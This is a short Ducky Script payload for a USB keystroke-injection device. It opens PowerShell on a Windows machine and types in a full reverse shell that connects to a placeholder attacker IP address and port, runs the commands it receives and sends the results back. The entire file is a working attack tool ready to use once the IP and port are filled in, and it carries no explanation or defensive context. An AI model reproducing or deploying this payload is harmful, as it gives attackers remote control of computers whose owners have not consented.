REM cyb3rloud
REM add your IP address and a listening port in the script 
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING $client = New-Object System.Net.Sockets.TCPClient('"YOUR_IP_ADDRESS"',YOUR_PORT);
DELAY 500
STRING $stream = $client.GetStream();
DELAY 500
STRING [byte[]]$bytes = 0..65535|%{0};
DELAY 500
STRING while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
DELAY 500
STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
DELAY 500
STRING $sendback = (iex $data 2>&1 | Out-String );
DELAY 500
STRING $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
DELAY 500
STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
DELAY 500
STRING $stream.Write($sendbyte,0,$sendbyte.Length);
DELAY 500
STRING $stream.Flush();
DELAY 500
STRING }
DELAY 500
STRING $client.Close();
ENTER
